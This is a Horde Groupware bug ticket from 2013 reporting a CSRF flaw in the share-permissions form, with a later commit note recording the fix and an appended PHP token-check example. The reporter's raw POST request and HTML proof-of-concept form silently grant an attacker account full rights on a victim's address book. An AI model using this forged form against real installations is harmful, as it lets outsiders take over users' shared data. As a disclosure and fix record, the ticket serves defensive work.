5/20/25

[#12804] CSRF in changing permissions functionality
Summary CSRF in changing permissions functionality
Queue Horde Groupware Webmail Edition
Queue Version 5.1.2
Type Bug
State Resolved
Priority 3. High
Owners jan (at) horde (dot) org
Requester m.benetrix (at) e-secure (dot) com (dot) au
Created 10/28/2013 (4222 days ago)
Due 11/05/2013 (4214 days ago)
Updated 10/29/2013 (4221 days ago)
Assigned
Resolved 10/29/2013 (4221 days ago)
Milestone
Patch No

History
10/29/2013 11:36:03 AM Jan Schneider Assigned to Jan Schneider
State ⇒ Resolved
 
10/29/2013 11:36:01 AM Git Commit Comment #2
Changes have been made in Git (master):

commit b79114d08ee8c8e43e74a179741749529f6d885c
Author: Jan Schneider <jan@horde.org>
Date:   Tue Oct 29 12:32:30 2013 +0100

     [jan] SECURITY: Protect against CSRF attacks on share permissions form (Bug #12804).

  horde/docs/CHANGES                  |    2 ++
  horde/package.xml                   |    4 +++-
  horde/services/shares/edit.php      |    5 +++++
  horde/templates/shares/edit.inc     |    1 +
  kronolith/docs/CHANGES              |    2 ++
  kronolith/package.xml               |    2 ++
  kronolith/perms.php                 |    5 +++++
  kronolith/templates/perms/perms.inc |    1 +
  8 files changed, 21 insertions(+), 1 deletions(-)

http://git.horde.org/horde-git/-/commit/b79114d08ee8c8e43e74a179741749529f6d885c
10/28/2013 11:18:33 PM m (dot) benetrix (at) e-secure (dot) com (dot) au Comment #1
Priority ⇒ 3. High
Patch ⇒ No
Milestone ⇒
Queue ⇒ Horde Groupware Webmail Edition
Due ⇒ 11/05/2013
Summary ⇒ CSRF in changing permissions functionality
Type ⇒ Bug
State ⇒ Unconfirmed
I found another one, a CSRF while a change of permissions is 
requested. It was found that this form misses a unique token.

Request:
POST /horde/services/shares/edit.php HTTP/1.1
Host: victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: session=a0db6c30e697fe3da03f9f437a63bb3f
Content-Type: application/x-www-form-urlencoded
Content-Length: 252

actionID=editform&cid=37&app=turba&owner_input=kenedyK&u_names%5B%7C%7Cnew_input%5D=AttackerUserName&u_read%5B%7C%7Cnew_input%5D=on&u_edit%5B%7C%7Cnew_input%5D=on&u_delete%5B%7C%7Cnew_input%5D=on&g_names%5B%7C%7Cnew%5D=&save_and_finish=Save+and+Finish


PoC

<html>

   <body>
     <!--a75c305b1c0a6022--><form action="www.victim.com/horde/services/shares/edit.php" method="POST">
       <input type="hidden" name="actionID" value="editform" />
       <input type="hidden" name="cid" value="37" />
       <input type="hidden" name="app" value="turba" />
       <input type="hidden" name="owner&#95;input" value="kenedyK" />
       <input type="hidden" name="u&#95;names&#91;&#124;&#124;new&#95;input&#93;" value="AttackerUserName" />
       <input type="hidden" name="u&#95;read&#91;&#124;&#124;new&#95;input&#93;" value="on" />
       <input type="hidden" name="u&#95;edit&#91;&#124;&#124;new&#95;input&#93;" value="on" />
       <input type="hidden" name="u&#95;delete&#91;&#124;&#124;new&#95;input&#93;" value="on" />
       <input type="hidden" name="g&#95;names&#91;&#124;&#124;new&#93;" value="" />
       <input type="hidden" name="save&#95;and&#95;finish" value="Save&#32;and&#32;Finish" />
       <input type="submit" value="Submit request" />
     </form>
   </body>
</html>


Conditions: The attacker must know the owner value which is the 
victim's username, and the ID of the address book. Once he gets them, 
he can launch the attack.
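
Added example, not part of the ticket and not Horde's code: a generic per-session token check of the kind Comment #2's commit message describes, run against the fields of the request in Comment #1. The field name csrf_token and all three function names are hypothetical.

```php
<?php
// Added example, not Horde code. 'csrf_token' and the function names
// below are hypothetical; the sample POST fields are taken from the report.

/** Return the session's form token, creating it on first use. */
function share_form_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

/** True only if the POST carries the token issued to this session. */
function share_form_token_valid(array $session, array $post): bool
{
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    return is_string($supplied)
        && $expected !== ''
        && hash_equals($expected, $supplied); // constant-time comparison
}

/** Handle the permissions POST; returns the HTTP status to send. */
function handle_share_edit(array $session, array $post): int
{
    if (($post['actionID'] ?? '') !== 'editform') {
        return 200; // no state change requested, just render the form
    }
    if (!share_form_token_valid($session, $post)) {
        return 403; // reject before any permission is touched
    }
    // ... apply the permission change here ...
    return 302; // redirect after a successful save
}

// Constructed input: a session that has rendered the form once, and the
// reported request's fields, which carry no token.
$session = [];
$token = share_form_token($session);
$reported = ['actionID' => 'editform', 'cid' => '37', 'app' => 'turba',
             'save_and_finish' => 'Save and Finish'];
$fromRealForm = $reported + ['csrf_token' => $token];

var_dump(handle_share_edit($session, $reported));
var_dump(handle_share_edit($session, $fromRealForm));
```

The form template would emit the value of share_form_token() as a hidden input, escaped with htmlspecialchars(), so only pages served to the logged-in user can submit it.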
